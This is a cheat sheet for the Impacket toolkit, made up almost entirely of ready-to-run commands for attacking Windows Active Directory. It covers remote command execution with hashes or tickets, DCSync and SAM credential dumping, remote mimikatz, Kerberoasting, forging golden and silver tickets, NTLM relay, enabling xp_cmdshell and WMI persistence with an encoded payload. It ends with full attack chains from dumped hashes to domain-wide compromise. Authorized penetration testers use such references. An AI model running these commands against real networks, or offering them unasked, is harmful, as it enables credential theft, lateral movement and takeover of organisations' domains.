
Impacket Suite

Impacket Suite Cheatsheet

Installation

Using pip

pip install impacket

From GitHub (latest)

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install .

Using pipx

pipx install impacket

Authentication Methods

Password Authentication

impacket-tool $domain/$username:$password@$target

NTLM Hash Authentication

impacket-tool $domain/$username@$target -hashes :$ntlm_hash
impacket-tool $domain/$username@$target -hashes $lm_hash:$ntlm_hash

Kerberos Authentication

export KRB5CCNAME=$ticket.ccache
impacket-tool $domain/$username@$target -k -no-pass

AES Key Authentication

impacket-tool $domain/$username@$target -aesKey $aes_key

Remote Execution

psexec.py - Remote Command Execution

# With password
impacket-psexec $domain/$username:$password@$target

# With hash
impacket-psexec $domain/$username@$target -hashes :$ntlm_hash

# Execute specific command
impacket-psexec $domain/$username:$password@$target "whoami"

# With custom service name
impacket-psexec $domain/$username:$password@$target -service-name LUALL

# Using RemComSvc method
impacket-psexec $domain/$username:$password@$target -remcomsvc

smbexec.py - SMB-based Command Execution

# Basic usage
impacket-smbexec $domain/$username:$password@$target

# With hash
impacket-smbexec $domain/$username@$target -hashes :$ntlm_hash

# With specific share
impacket-smbexec $domain/$username:$password@$target -share ADMIN$

# Silent mode (no output)
impacket-smbexec $domain/$username:$password@$target -mode SERVER

wmiexec.py - WMI-based Command Execution

# Basic usage
impacket-wmiexec $domain/$username:$password@$target

# With hash
impacket-wmiexec $domain/$username@$target -hashes :$ntlm_hash

# Execute command without shell
impacket-wmiexec $domain/$username:$password@$target "systeminfo"

# With specific namespace
impacket-wmiexec $domain/$username:$password@$target -namespace root\\cimv2

# Debug mode
impacket-wmiexec $domain/$username:$password@$target -debug

atexec.py - Task Scheduler Execution

# Execute command via Task Scheduler
impacket-atexec $domain/$username:$password@$target "whoami"

# With hash
impacket-atexec $domain/$username@$target -hashes :$ntlm_hash "systeminfo"

dcomexec.py - DCOM-based Execution

# Using MMC20 method (default)
impacket-dcomexec -object MMC20 $domain/$username:$password@$target 'powershell -e JABjAGwAaQBlAG...SNIP...AbwBzAGUAKAApAA==' -silentcommand


# Using ShellWindows method
impacket-dcomexec $domain/$username:$password@$target -object ShellWindows

# Using ShellBrowserWindow method
impacket-dcomexec $domain/$username:$password@$target -object ShellBrowserWindow

# With hash
impacket-dcomexec $domain/$username@$target -hashes :$ntlm_hash

Credential Dumping

secretsdump.py - Dump Credentials

# Dump all secrets from DC
impacket-secretsdump $domain/$username:$password@$dc_ip

# Dump NTDS.dit (DCSync)
impacket-secretsdump $domain/$username:$password@$dc_ip -just-dc

# Dump specific user via DCSync
impacket-secretsdump $domain/$username:$password@$dc_ip -just-dc-user krbtgt

# Dump NTDS with history
impacket-secretsdump $domain/$username:$password@$dc_ip -just-dc -history

# Use VSS method
impacket-secretsdump $domain/$username:$password@$dc_ip -use-vss

# From local SAM and SYSTEM files
impacket-secretsdump -sam $sam_file -system $system_file LOCAL

# From NTDS.dit file
impacket-secretsdump -ntds $ntds_file -system $system_file LOCAL

# Output to file
impacket-secretsdump $domain/$username:$password@$dc_ip -outputfile credentials

# Dump LSA secrets only
impacket-secretsdump $domain/$username:$password@$target -just-dc-ntlm

# With Kerberos
export KRB5CCNAME=$ticket.ccache
impacket-secretsdump $domain/$username@$dc_ip -k -no-pass

mimikatz.py - Remote Mimikatz

# Run Mimikatz remotely
impacket-mimikatz $domain/$username:$password@$target

# With specific command
impacket-mimikatz $domain/$username:$password@$target -c "lsadump::sam"

reg.py - Remote Registry Operations

# Query registry key
impacket-reg $domain/$username:$password@$target query -keyName HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion

# Add registry key
impacket-reg $domain/$username:$password@$target add -keyName HKLM\\SOFTWARE\\Test

# Delete registry key
impacket-reg $domain/$username:$password@$target delete -keyName HKLM\\SOFTWARE\\Test

# Save hive
impacket-reg $domain/$username:$password@$target save -keyName HKLM\\SAM

SMB Operations

smbclient.py - SMB Client

# List shares
impacket-smbclient $domain/$username:$password@$target

# With hash
impacket-smbclient $domain/$username@$target -hashes :$ntlm_hash

# Connect to specific share
impacket-smbclient $domain/$username:$password@$target -share C$

# Execute local file on share
impacket-smbclient $domain/$username:$password@$target -file $commands.txt

smbserver.py - SMB Server

# Start SMB server
impacket-smbserver share_name /path/to/share

# With authentication
impacket-smbserver share_name /path/to/share -username $user -password $pass

# SMB2 support
impacket-smbserver share_name /path/to/share -smb2support

# With specific IP
impacket-smbserver share_name /path/to/share -ip $listen_ip

# Debug mode
impacket-smbserver share_name /path/to/share -debug

# With comment
impacket-smbserver share_name /path/to/share -comment "Test Share"

smbpasswd.py - Change SMB Password

# Change password
impacket-smbpasswd $domain/$username:$oldpassword@$target -newpass $newpassword

# With hash
impacket-smbpasswd $domain/$username@$target -hashes :$ntlm_hash -newpass $newpassword

Kerberos Attacks

GetTGT.py - Request TGT

# Request TGT with password
impacket-getTGT $domain/$username:$password

# Request TGT with hash
impacket-getTGT $domain/$username -hashes :$ntlm_hash

# Request TGT with AES key
impacket-getTGT $domain/$username -aesKey $aes_key

# Save to specific file
impacket-getTGT $domain/$username:$password -outputfile $username.ccache

# With domain controller IP
impacket-getTGT $domain/$username:$password -dc-ip $dc_ip

GetST.py - Request Service Ticket

# Request service ticket with TGT
export KRB5CCNAME=$username.ccache
impacket-getST -k -no-pass -spn cifs/$target.$domain $domain/$username

# With password
impacket-getST -spn cifs/$target.$domain $domain/$username:$password

# Impersonate user (S4U)
impacket-getST -spn cifs/$target.$domain -impersonate Administrator $domain/$service_account:$password

# Save ticket
impacket-getST -spn cifs/$target.$domain $domain/$username:$password -outputfile $service.ccache

GetNPUsers.py - ASREPRoasting

# Get AS-REP for users without pre-auth
impacket-GetNPUsers $domain/ -no-pass -usersfile $users.txt

# With authentication
impacket-GetNPUsers $domain/$username:$password -request -dc-ip $dc_ip

# Output in John format
impacket-GetNPUsers $domain/ -no-pass -usersfile $users.txt -format john -dc-ip $dc_ip

# Output in Hashcat format
impacket-GetNPUsers $domain/ -no-pass -usersfile $users.txt -format hashcat -dc-ip $dc_ip

# Target specific user
impacket-GetNPUsers $domain/ -no-pass -user $target_user -dc-ip $dc_ip

# With DC IP
impacket-GetNPUsers $domain/ -no-pass -usersfile $users.txt -dc-ip $dc_ip

GetUserSPNs.py - Kerberoasting

# Get SPNs and TGS tickets
impacket-GetUserSPNs $domain/$username:$password -request

# With hash
impacket-GetUserSPNs $domain/$username -hashes :$ntlm_hash -request

# Output in John format
impacket-GetUserSPNs $domain/$username:$password -request -format john -outputfile $hashes.txt

# Output in Hashcat format
impacket-GetUserSPNs $domain/$username:$password -request -format hashcat -outputfile $hashes.txt

# Target specific SPN
impacket-GetUserSPNs $domain/$username:$password -request-user $service_account

# With DC IP
impacket-GetUserSPNs $domain/$username:$password -request -dc-ip $dc_ip

ticketer.py - Golden/Silver Ticket Creation

# Create Golden Ticket
impacket-ticketer -nthash $krbtgt_hash -domain-sid $domain_sid -domain $domain Administrator

# Create Silver Ticket
impacket-ticketer -nthash $service_hash -domain-sid $domain_sid -domain $domain -spn cifs/$target.$domain Administrator

# With specific user ID
impacket-ticketer -nthash $krbtgt_hash -domain-sid $domain_sid -domain $domain -user-id 500 Administrator

# With groups
impacket-ticketer -nthash $krbtgt_hash -domain-sid $domain_sid -domain $domain -groups 512,513,519 Administrator

# With duration
impacket-ticketer -nthash $krbtgt_hash -domain-sid $domain_sid -domain $domain -duration 365 Administrator

# With AES key
impacket-ticketer -aesKey $aes_key -domain-sid $domain_sid -domain $domain Administrator

ticketConverter.py - Convert Ticket Formats

# Convert kirbi to ccache
impacket-ticketConverter $ticket.kirbi $ticket.ccache

# Convert ccache to kirbi
impacket-ticketConverter $ticket.ccache $ticket.kirbi

LDAP Operations

ldapdomaindump.py - Dump LDAP Information

# Dump all LDAP info
ldapdomaindump $domain/$username:$password@$dc_ip

# With hash
ldapdomaindump $domain/$username@$dc_ip -hashes :$ntlm_hash

# Output to specific directory
ldapdomaindump $domain/$username:$password@$dc_ip -o /tmp/ldap_dump

# No JSON output
ldapdomaindump $domain/$username:$password@$dc_ip -no-json

# No grep-friendly output
ldapdomaindump $domain/$username:$password@$dc_ip -no-grep

GetADUsers.py - Enumerate AD Users

# Get all users
impacket-GetADUsers $domain/$username:$password

# With specific attributes
impacket-GetADUsers $domain/$username:$password -all

# With DC IP
impacket-GetADUsers $domain/$username:$password -dc-ip $dc_ip

# Debug mode
impacket-GetADUsers $domain/$username:$password -debug

Network Protocols

ntlmrelayx.py - NTLM Relay

# Basic relay to target
impacket-ntlmrelayx -t smb://$target

# With command execution
impacket-ntlmrelayx -t smb://$target -c "whoami"

# Relay to multiple targets
impacket-ntlmrelayx -tf $targets.txt

# With socks proxy
impacket-ntlmrelayx -t smb://$target -socks

# Dump SAM
impacket-ntlmrelayx -t smb://$target -dump-sam

# Interactive shell
impacket-ntlmrelayx -t smb://$target -i

# Specific SMB2 support
impacket-ntlmrelayx -t smb://$target -smb2support

# Relay to LDAP for shadow credentials
impacket-ntlmrelayx -t ldaps://$dc_ip --shadow-credentials --shadow-target $target$

# Relay to LDAP for RBCD
impacket-ntlmrelayx -t ldaps://$dc_ip --delegate-access

# Enumerate local admins
impacket-ntlmrelayx -tf $targets.txt -enum-local-admins

# With WPAD
impacket-ntlmrelayx -t smb://$target -wpad wpad.dat

responder.py (separate tool; not part of the Impacket suite)

# Start Responder
responder -I eth0 -dwP

# Analyze mode
responder -I eth0 -A

# With specific poisoners
responder -I eth0 -r -d -w

# Fingerprint mode
responder -I eth0 -F

MS-RPC Operations

rpcdump.py - Enumerate RPC Endpoints

# Enumerate RPC endpoints
impacket-rpcdump $domain/$username:$password@$target

# With specific port
impacket-rpcdump $domain/$username:$password@$target -port 445

# With hash
impacket-rpcdump $domain/$username@$target -hashes :$ntlm_hash

samrdump.py - SAM Remote Dump

# Enumerate users via SAM-R
impacket-samrdump $domain/$username:$password@$target

# With specific port
impacket-samrdump $domain/$username:$password@$target -port 445

# With hash
impacket-samrdump $domain/$username@$target -hashes :$ntlm_hash

lookupsid.py - SID Bruteforce

# Enumerate SIDs
impacket-lookupsid $domain/$username:$password@$target

# With maximum RID
impacket-lookupsid $domain/$username:$password@$target -max-rid 4000

# With hash
impacket-lookupsid $domain/$username@$target -hashes :$ntlm_hash

# With domain SID
impacket-lookupsid $domain/$username:$password@$target -domain-sid $domain_sid

rpcmap.py - RPC Endpoint Mapper

# Map RPC endpoints
impacket-rpcmap 'ncacn_ip_tcp:$target'

# With authentication
impacket-rpcmap 'ncacn_ip_tcp:$target' -auth-type 1 -username $username -password $password

# List interfaces
impacket-rpcmap 'ncacn_ip_tcp:$target[135]'

Database Attacks

mssqlclient.py - MSSQL Client

# Connect to MSSQL
impacket-mssqlclient $domain/$username:$password@$target

# With Windows authentication
impacket-mssqlclient $domain/$username:$password@$target -windows-auth

# Execute OS command
impacket-mssqlclient $domain/$username:$password@$target -query "EXEC xp_cmdshell 'whoami'"

# With specific database
impacket-mssqlclient $domain/$username:$password@$target -db $database

# With hash
impacket-mssqlclient $domain/$username@$target -windows-auth -hashes :$ntlm_hash

# Enable xp_cmdshell
impacket-mssqlclient $domain/$username:$password@$target -enable-xp_cmdshell

WMI Operations

wmiquery.py - WMI Queries

# Execute WMI query
impacket-wmiquery $domain/$username:$password@$target "SELECT * FROM Win32_OperatingSystem"

# With specific namespace
impacket-wmiquery $domain/$username:$password@$target -namespace root\\cimv2 "SELECT * FROM Win32_Process"

# With hash
impacket-wmiquery $domain/$username@$target -hashes :$ntlm_hash "SELECT * FROM Win32_Service"

wmipersist.py - WMI Persistence

# Create WMI event subscription
impacket-wmipersist $domain/$username:$password@$target install -name "TestEvent" -command "cmd.exe /c calc.exe"

# Remove persistence
impacket-wmipersist $domain/$username:$password@$target remove -name "TestEvent"

# With hash
impacket-wmipersist $domain/$username@$target -hashes :$ntlm_hash install -name "TestEvent" -command "powershell.exe -enc $b64_payload"

Other Useful Tools

addcomputer.py - Add Computer Account

# Add computer account
impacket-addcomputer $domain/$username:$password -computer-name $computer$ -computer-pass $computer_password

# With specific DC
impacket-addcomputer $domain/$username:$password -computer-name $computer$ -computer-pass $computer_password -dc-ip $dc_ip

# With hash
impacket-addcomputer $domain/$username -hashes :$ntlm_hash -computer-name $computer$ -computer-pass $computer_password

# Delete computer
impacket-addcomputer $domain/$username:$password -computer-name $computer$ -delete

exchanger.py - Exchange Privilege Escalation

# Escalate via Exchange
impacket-exchanger $domain/$username:$password@$exchange_server -rpc-hostname $exchange_name

findDelegation.py - Find Delegation

# Find delegation opportunities
impacket-findDelegation $domain/$username:$password

# With specific DC
impacket-findDelegation $domain/$username:$password -dc-ip $dc_ip

# With hash
impacket-findDelegation $domain/$username -hashes :$ntlm_hash

Get-GPPPassword.py - Extract GPP Passwords

# Extract GPP passwords
impacket-Get-GPPPassword $domain/$username:$password@$target

# With hash
impacket-Get-GPPPassword $domain/$username@$target -hashes :$ntlm_hash

# From local file
impacket-Get-GPPPassword -xmlfile $groups.xml

mqtt_check.py - MQTT Check

# Check MQTT service
impacket-mqtt_check $target

# With credentials
impacket-mqtt_check $target -username $username -password $password

rdp_check.py - RDP Check

# Check RDP
impacket-rdp_check $domain/$username:$password@$target

# With hash
impacket-rdp_check $domain/$username@$target -hashes :$ntlm_hash

services.py - Service Operations

# List services
impacket-services $domain/$username:$password@$target list

# Start service
impacket-services $domain/$username:$password@$target start -name $service_name

# Stop service
impacket-services $domain/$username:$password@$target stop -name $service_name

# Create service
impacket-services $domain/$username:$password@$target create -name $service_name -display $display_name -path $binary_path

# Delete service
impacket-services $domain/$username:$password@$target delete -name $service_name

# Change service config
impacket-services $domain/$username:$password@$target change -name $service_name -start-type auto

netview.py - Network View

# Enumerate network
impacket-netview $domain/$username:$password@$target

# List users
impacket-netview $domain/$username:$password@$target -users

# List shares
impacket-netview $domain/$username:$password@$target -shares

# List sessions
impacket-netview $domain/$username:$password@$target -sessions

# With specific target list
impacket-netview $domain/$username:$password -targets $targets.txt

Useful Attack Chains

Pass-the-Hash Attack Chain

# 1. Dump hashes
impacket-secretsdump $domain/$username:$password@$target -outputfile hashes

# 2. Use hash for authentication
impacket-wmiexec $domain/Administrator@$target -hashes :$admin_hash

# 3. Dump more credentials
impacket-secretsdump $domain/Administrator@$dc_ip -hashes :$admin_hash -just-dc

Kerberoasting Attack Chain

# 1. Find SPNs
impacket-GetUserSPNs $domain/$username:$password

# 2. Request TGS tickets
impacket-GetUserSPNs $domain/$username:$password -request -outputfile hashes.txt

# 3. Crack offline with hashcat
hashcat -m 13100 hashes.txt wordlist.txt

DCSync Attack Chain

# 1. Get domain admin privileges (various methods)
# 2. Perform DCSync
impacket-secretsdump $domain/$da_user:$da_password@$dc_ip -just-dc

# 3. Create golden ticket with krbtgt hash
impacket-ticketer -nthash $krbtgt_hash -domain-sid $domain_sid -domain $domain Administrator

# 4. Use ticket
export KRB5CCNAME=Administrator.ccache
impacket-wmiexec $domain/Administrator@$target -k -no-pass

NTLM Relay Attack Chain

# Terminal 1: Start relay
impacket-ntlmrelayx -tf targets.txt -smb2support -socks

# Terminal 2: Trigger authentication (various methods)
# Could use Responder, mitm6, PrinterBug, PetitPotam, etc.

# Terminal 3: Use SOCKS proxy
proxychains impacket-secretsdump $domain/$username@$target -no-pass

Important Notes

Common Variables:

  • $domain = Domain name (e.g., corp.local)
  • $username = Username
  • $password = Password
  • $target = Target IP or hostname
  • $dc_ip = Domain Controller IP
  • $ntlm_hash = NTLM hash (32 hex characters)
  • $lm_hash = LM hash (32 hex characters)
  • $krbtgt_hash = krbtgt NTLM hash
  • $domain_sid = Domain SID (e.g., S-1-5-21-...)
  • $ticket.ccache = Kerberos ticket file

Authentication Priority:

  1. Kerberos (-k with KRB5CCNAME environment variable)
  2. NTLM Hash (-hashes)
  3. Password
  4. AES Key (-aesKey)

Output Files:

  • SecretsDump: [target]_samhashes.txt, [target]_cached.txt, [target]_lsa.secrets
  • Kerberoasting: [service].tgs
  • ASREPRoasting: [user].asrep

Environment Variables:

# For Kerberos authentication
export KRB5CCNAME=ticket.ccache

# For proxychains with SOCKS
export SOCKS_PROXY=127.0.0.1:1080

Tips:

  • Most tools support -debug flag for verbose output
  • Use -codec to specify encoding (useful for non-ASCII characters)
  • Many tools support -k -no-pass for Kerberos auth
  • Tools typically use port 445 (SMB) or 135 (RPC) by default
  • Add -ts for timestamps in output

Common Ports:

  • 88: Kerberos
  • 135: MS-RPC
  • 139: NetBIOS
  • 389: LDAP
  • 445: SMB
  • 464: Kerberos Password Change
  • 636: LDAPS
  • 1433: MSSQL
  • 3268: Global Catalog
  • 3389: RDP
  • 5985: WinRM HTTP
  • 5986: WinRM HTTPS